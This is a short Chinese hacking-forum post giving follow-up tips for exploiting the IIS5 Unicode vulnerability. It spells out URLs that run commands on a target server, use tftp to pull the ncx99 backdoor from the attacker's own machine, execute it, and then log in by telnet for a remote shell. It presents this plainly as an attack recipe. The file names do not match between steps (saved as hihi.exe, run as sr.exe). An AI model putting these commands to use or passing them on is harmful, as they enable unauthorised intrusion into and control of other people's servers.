IIS5 UNICODE 编码漏洞的利用心得补充

看了你的文章【unicode】写的很好，
我来说说用tftp怎么搞：
下载http://www.cners.com/tools/unicode.zip(下载快着呢)
解压:
tftpd32.exe
ncx99.exe

本机运行tftpd32.exe
再（接着你的来）：

http://192.168.8.48/scripts/ccc.exe?/c+tftp -i 本地ip GET ncx99.exe c://inetpub//scripts//hihi.exe

注意了：这是将你本机的ncx99.exe 上传到对方的 scripts下！
下面执行它：
http://192.168.8.48/scripts/ccc.exe?/c+c:/inetpub/scripts/sr.exe

这时在你的tftp上就能看到对方ip的信息了！

下面可以干的就不用说了！

用telnet 或SecureCRT.EXE软件登陆192.168.8.48就可以了！（推荐用SecureCrt）

{
零点
http://www.net7b.com{我的站点}
http://www.net7b.com/net7b_heike(网络奇兵网络安全中心)